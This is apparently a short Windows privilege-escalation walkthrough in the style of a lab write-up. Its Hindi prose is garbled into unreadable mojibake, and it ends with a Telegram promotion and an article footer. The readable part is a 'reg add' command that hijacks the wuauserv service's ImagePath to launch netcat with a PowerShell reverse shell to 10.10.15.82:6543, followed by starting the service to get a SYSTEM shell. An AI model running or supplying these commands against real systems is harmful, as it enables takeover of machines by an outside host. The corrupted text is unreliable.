рд╡рд┐рдВрдбреЛрдЬ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рд╕реЗрд╡рд╛рдПрдВ рд╕рд┐рд╕реНрдЯрдо рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдЪрд▓рддреА рд╣реИрдВред рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдХрд┐рд╕реА рд╕реЗрд╡рд╛ рдХреЛ рдкрдВрдЬреАрдХреГрдд рдХрд░рддреЗ рд╕рдордп, рд╕реЗрд╡рд╛ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдкрде ImagePath рд╡рд┐рд╢реЗрд╖рддрд╛ рдореЗрдВ рд╕реБрд░рдХреНрд╖рд┐рдд рд╣реЛрддрд╛ рд╣реИред рдЖрдЗрдП рдЗрд╕ рд╡рд┐рд╢реЗрд╖рддрд╛ рдХреЗ рдореВрд▓реНрдп рдХреЛ рдмрджрд▓реЗрдВ рдФрд░ рд╢реЗрд▓ рдХреЛ рд▓реЛрдб рдХрд░реЗрдВред
reg add "HKLM\System\CurrentControlSet\Services\wuauserv" /v ImagePath /t REG_SZ /d "C:\Users\Hector\Documents\nc.exe -e powershell 10.10.15.82 6543"


рдЕрдм рдЕрдкрдбреЗрдЯ рд╕реЗрд╡рд╛ рд╢реБрд░реВ рдХрд░реЗрдВред
start-service wuauserv


рдФрд░ рд╣рдореЗрдВ рдЕрдзрд┐рдХрддрдо рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдХреЗ рд╕рд╛рде рдПрдХ рд╢реЗрд▓ рдорд┐рд▓рддрд╛ рд╣реИред

рдЫрд╡рд┐

рдЖрдк рд╣рдорд╕реЗ рдЯреЗрд▓реАрдЧреНрд░рд╛рдо рдкрд░ рдЬреБрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВ ред рд╡рд╣рд╛рдВ рдЖрдк рджрд┐рд▓рдЪрд╕реНрдк рд╕рд╛рдордЧреНрд░реА, рдорд░реНрдЬ рдХрд┐рдП рдЧрдП рдкрд╛рдареНрдпрдХреНрд░рдо, рд╕рд╛рде рд╣реА рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВред рдЖрдЗрдП рдПрдХ рд╕рдореБрджрд╛рдп рдХреЛ рдПрдХ рд╕рд╛рде рд░рдЦреЗрдВ рдЬрд┐рд╕рдореЗрдВ рдРрд╕реЗ рд▓реЛрдЧ рд╣реЛрдВрдЧреЗ рдЬреЛ рдЖрдИрдЯреА рдХреЗ рдХрдИ рдХреНрд╖реЗрддреНрд░реЛрдВ рдореЗрдВ рдкрд╛рд░рдВрдЧрдд рд╣реИрдВ, рдлрд┐рд░ рд╣рдо рд╣рдореЗрд╢рд╛ рдХрд┐рд╕реА рднреА рдЖрдИрдЯреА рдФрд░ рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдореБрджреНрджреЛрдВ рдкрд░ рдПрдХ рджреВрд╕рд░реЗ рдХреА рдорджрдж рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

More articles:


All Articles